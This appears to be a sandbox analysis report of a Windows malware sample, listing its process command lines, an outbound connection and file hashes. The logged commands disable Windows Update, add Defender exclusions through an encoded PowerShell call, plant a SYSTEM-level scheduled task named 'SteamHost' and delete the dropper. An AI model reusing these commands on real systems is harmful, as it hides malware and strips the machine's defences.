HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\Chrome\updater.exe

C:\Users\Admin\Chrome\updater.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\Chrome\updater.exe

C:\Users\Admin\Chrome\updater.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config bits start= disabled

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\sc.exe

sc failure bits reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config dosvc start= disabled

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc failure dosvc reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\sc.exe

sc config UsoSvc start= disabled

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\sc.exe

sc failure UsoSvc reset= 0 actions= ""

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\sc.exe

sc config wuauserv start= disabled

C:\Windows\system32\sc.exe

sc failure wuauserv reset= 0 actions= ""

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\takeown.exe

takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\icacls.exe

icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"

Network

Country Destination Domain Proto
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp
DE 162.55.169.73:49194 tcp

Files

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 fa0429acc4b9cfd414d24fae0e299790
SHA1 80d76038b5401080e18e6b015cbf806d9abe8589
SHA256 1440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489
